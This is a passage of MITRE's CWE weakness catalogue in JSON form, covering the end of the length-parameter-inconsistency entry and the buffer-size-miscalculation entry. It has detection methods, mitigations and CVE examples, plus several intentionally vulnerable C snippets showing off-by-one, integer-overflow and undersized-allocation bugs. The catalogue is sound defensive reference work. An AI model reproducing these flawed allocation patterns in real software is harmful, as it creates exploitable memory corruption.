field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0430"},{"Reference":"CVE-2005-0064","Description":"PDF viewer allows remote attackers to execute arbitrary code via a PDF file with a large /Encrypt /Length keyLength value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0064"},{"Reference":"CVE-2004-0413","Description":"SVN client trusts the length field of SVN protocol URL strings, which allows remote attackers to cause a denial of service and possibly execute arbitrary code via an integer overflow that leads to a heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0413"},{"Reference":"CVE-2004-0940","Description":"Is effectively an accidental double increment of a counter that prevents a length check conditional from exiting a loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0940"},{"Reference":"CVE-2002-1235","Description":"Length field of a request not verified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1235"},{"Reference":"CVE-2005-3184","Description":"Buffer overflow by modifying a length value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3184"},{"Reference":"SECUNIA:18747","Description":"Length field inconsistency crashes cell phone.","Link":"http://secunia.com/advisories/18747/"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Length Parameter Inconsistency"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"47"}}},"Notes":{"Note":{"#text":"This probably overlaps other categories including zero-length issues.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Name, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Description, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Length Parameter Inconsistency","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Handle Length Parameter Inconsistency","attr":{"@_Date":"2009-03-10"}}]}},"131":{"attr":{"@_ID":"131","@_Name":"Incorrect Calculation of Buffer Size","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not correctly calculate the size to be used when allocating a buffer, which could lead to a buffer overflow.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands","Read Memory","Modify Memory"],"Note":"If the incorrect calculation is used in the context of memory allocation, then the software may create a buffer that is smaller or larger than expected. If the allocated buffer is smaller than expected, this could lead to an out-of-bounds read or write (CWE-119), possibly causing a crash, allowing arbitrary code execution, or exposing sensitive data."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting potential errors in buffer calculations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"Detection techniques for buffer-related errors are more mature than for most other weakness types."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate","Effectiveness_Notes":"Without visibility into the code, black box methods may not be able to sufficiently distinguish this weakness from others, requiring follow-up manual methods to diagnose the underlying problem."},{"attr":{"@_Detection_Method_ID":"DM-9"},"Method":"Manual Analysis","Description":"Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large."},{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of allocation calculations. This can be useful for detecting overflow conditions (CWE-190) or similar weaknesses that might have serious security impacts on the program."]},"Effectiveness":"High","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Source Code Quality Analyzer"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When allocating a buffer for the purpose of transforming, converting, or encoding an input, allocate enough memory to handle the largest possible encoding. For example, in a routine that converts \\"&\\" characters to \\"&amp;\\" for HTML entity encoding, the output buffer needs to be at least 5 times as large as the input buffer."},{"attr":{"@_Mitigation_ID":"MIT-36"},"Phase":"Implementation","Description":{"xhtml:p":["Understand the programming language\'s underlying representation and how it interacts with numeric calculation (CWE-681). Pay close attention to byte size discrepancies, precision, signed/unsigned distinctions, truncation, conversion and casting between types, \\"not-a-number\\" calculations, and how the language handles numbers that are too large or too small for its underlying representation. [REF-7]","Also be careful to account for 32-bit, 64-bit, and other potential differences that may affect the numeric representation."]}},{"attr":{"@_Mitigation_ID":"MIT-8"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Perform input validation on any numeric input by ensuring that it is within the expected range. Enforce that the input meets both the minimum and maximum requirements for the expected range."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"Phase":"Implementation","Description":"When processing structured incoming data containing a size field followed by raw data, identify and resolve any inconsistencies between the size field and the actual size of the data (CWE-130)."},{"Phase":"Implementation","Description":"When allocating memory that uses sentinels to mark the end of a data structure - such as NUL bytes in strings - make sure you also include the sentinel in your calculation of the total amount of memory that must be allocated."},{"attr":{"@_Mitigation_ID":"MIT-13"},"Phase":"Implementation","Description":"Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available.","Effectiveness":"Moderate","Effectiveness_Notes":"This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131). Additionally, this only addresses potential overflow issues. Resource consumption / exhaustion issues are still possible."},{"Phase":"Implementation","Description":"Use sizeof() on the appropriate data type to avoid CWE-467."},{"Phase":"Implementation","Description":"Use the appropriate type for the desired action. For example, in C/C++, only use unsigned types for values that could never be negative, such as height, width, or other numbers related to quantity. This will simplify validation and will reduce surprises related to unexpected casting."},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Use libraries or frameworks that make it easier to handle numbers without unexpected consequences, or buffer allocation routines that automatically track buffer size.","Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++). [REF-106]"]}},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-61] [REF-60].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-26"},"Phase":"Implementation","Strategy":"Compilation or Build Hardening","Description":"Examine compiler warnings closely and eliminate problems with potential security implications, such as signed / unsigned mismatch in memory operations, or use of uninitialized variables. Even if the weakness is rarely exploitable, a single failure may lead to the compromise of the entire system."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-20"},"Intro_Text":"The following code allocates memory for a maximum number of widgets. It then gets a user-specified number of widgets, making sure that the user does not request too many. It then initializes the elements of the array using InitializeWidget(). Because the number of widgets can vary for each request, the code inserts a NULL pointer to signify the location of the last widget.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int i;unsigned int numWidgets;Widget **WidgetList;numWidgets = GetUntrustedSizeValue();if ((numWidgets == 0) || (numWidgets > MAX_NUM_WIDGETS)) {}WidgetList = (Widget **)malloc(numWidgets * sizeof(Widget *));printf(\\"WidgetList ptr=%p\\\\n\\", WidgetList);for(i=0; i<numWidgets; i++) {}WidgetList[numWidgets] = NULL;showWidgets(WidgetList);","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Incorrect number of widgets requested!\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"WidgetList[i] = InitializeWidget();","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"However, this code contains an off-by-one calculation error (CWE-193). It allocates exactly enough space to contain the specified number of widgets, but it does not include the space for the NULL pointer. As a result, the allocated buffer is smaller than it is supposed to be (CWE-131). So if the user ever requests MAX_NUM_WIDGETS, there is an out-of-bounds write (CWE-787) when the NULL is assigned. Depending on the environment and compilation settings, this could cause memory corruption."},{"attr":{"@_Demonstrative_Example_ID":"DX-33"},"Intro_Text":"The following image processing code allocates a table for images.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);...","xhtml:br":["","","","",""]}},"Body_Text":"This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119)."},{"attr":{"@_Demonstrative_Example_ID":"DX-19"},"Intro_Text":"This example applies an encoding procedure to an input string and stores it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char * copy_input(char *user_supplied_string){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE <= strlen(user_supplied_string) ){}dst_index = 0;for ( i = 0; i < strlen(user_supplied_string); i++ ){}return dst_buf;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"die(\\"user string too long, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( \'&\' == user_supplied_string[i] ){}else if (\'<\' == user_supplied_string[i] ){}else dst_buf[dst_index++] = user_supplied_string[i];","xhtml:div":[{"#text":"dst_buf[dst_index++] = \'&\';dst_buf[dst_index++] = \'a\';dst_buf[dst_index++] = \'m\';dst_buf[dst_index++] = \'p\';dst_buf[dst_index++] = \';\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* encode to &lt; */"}}],"xhtml:br":["",""]}}]}}}},"Body_Text":"The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands."},{"attr":{"@_Demonstrative_Example_ID":"DX-21"},"Intro_Text":"The following code is intended to read an incoming packet from a socket and extract one or more headers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"DataPacket *packet;int numHeaders;PacketHeader *headers;sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet->headers;if (numHeaders > 100) {}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers);","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"#text":"ExitError(\\"too many headers!\\");","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow."},{"Intro_Text":"The following code attempts to save three different identification numbers into an array. The array is allocated from memory using a call to malloc().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int *id_sequence;id_sequence = (int*) malloc(3);if (id_sequence == NULL) exit(1);id_sequence[0] = 13579;id_sequence[1] = 24680;id_sequence[2] = 97531;","xhtml:br":["","","","","","","","","","","","",""],"xhtml:i":["/* Allocate space for an array of three ids. */","/* Populate the id array. */"]}},"Body_Text":["The problem with the code above is the value of the size parameter used during the malloc() call. It uses a value of \'3\' which by definition results in a buffer of three bytes to be created. However the intention was to create a buffer that holds three ints, and in C, each int requires 4 bytes worth of memory, so an array of 12 bytes is needed, 4 bytes for each int. Executing the above code could result in a buffer overflow as 12 bytes of data is being saved into 3 bytes worth of allocated space. The overflow would occur during the assignment of id_sequence[0] and would continue with the assignment of id_sequence[1] and id_sequence[2].","The malloc() call could have used \'3*sizeof(int)\' as the value for the size parameter in order to allocate the correct amount of space required to store the three ints."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1363","Description":"substitution overflow: buffer overflow using environment variables that are expanded after the length check is performed","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1363"},{"Reference":"CVE-2004-0747","Description":"substitution overflow: buffer overflow using expansion of environment variables","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0747"},{"Reference":"CVE-2005-2103","Description":"substitution overflow: buffer overflow using a large number of substitution strings","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2103"},{"Reference":"CVE-2005-3120","Description":"transformation overflow: product adds extra escape characters to incoming data, but does not account for them in the buffer length","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3120"},{"Reference":"CVE-2003-0899","Description":"transformation overflow: buffer overflow when expanding \\">\\" to \\"&gt;\\", etc.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0899"},{"Reference":"CVE-2001-0334","Description":"expansion overflow: buffer overflow using wildcards","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0334"},{"Reference":"CVE-2001-0248","Description":"expansion overflow: long pathname + glob = overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0248"},{"Reference":"CVE-2001-0249","Description":"expansion overflow: long pathname + glob = overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0249"},{"Reference":"CVE-2002-0184","Description":"special characters in argument are not properly expanded","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0184"},{"Reference":"CVE-2004-0434","Description":"small length value leads to heap overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0434"},{"Reference":"CVE-2002-1347","Description":"multiple variants","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1347"},{"Reference":"CVE-2005-0490","Description":"needs closer investigation, but probably expansion-based","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0490"},{"Reference":"CVE-2004-0940","Description":"needs closer investigation, but probably expansion-based","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0940"},{"Reference":"CVE-2008-0599","Description":"Chain: Language interpreter calculates wrong buffer size (CWE-131) by using \\"size = ptr ? X : Y\\" instead of \\"size = (ptr ? X : Y)\\" expression.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0599"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Other length calculation error"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT30-C","Entry_Name":"Ensure that unsigned integer operations do not wrap","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM35-C","Entry_Name":"Allocate sufficient memory for an object","Mapping_Fit":"CWE More Abstract"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"100"}},{"attr":{"@_CAPEC_ID":"47"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-106"}},{"attr":{"@_External_Reference_ID":"REF-107"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 20, "Integer Overflows" Page 620"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 5: Buffer Overruns." Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "Incrementing Pointers Incorrectly", Page 401"}},{"attr":{"@_External_Reference_ID":"REF-64"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Maintenance"},"xhtml:p":["This is a broad category. Some examples include:","This level of detail is rarely available in public reports, so it is difficult to find good examples."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["simple math errors,","incorrectly updating parallel counters,","not accounting for size differences when \\"transforming\\" one input to another format (e.g. URL canonicalization or other transformation that can generate a result that\'s larger than the original input, i.e. \\"expansion\\")."]}}},{"attr":{"@_Type":"Maintenance"},"xhtml:p":["This weakness may be a composite or a chain. It also may contain layering or perspective differences.","This issue may be associated with many different types of incorrect calculations (CWE-682), although the integer overflow (CWE-190) is probably the most prevalent. This can be primary to resource consumption problems (CWE-400), including uncontrolled memory allocation (CWE-789). However, its relationship with out-of-bounds buffer access (CWE-119) must also be considered."]}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Maintenance_Notes, Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Likelihood_of_Exploit, Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Maintenance_Notes, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content 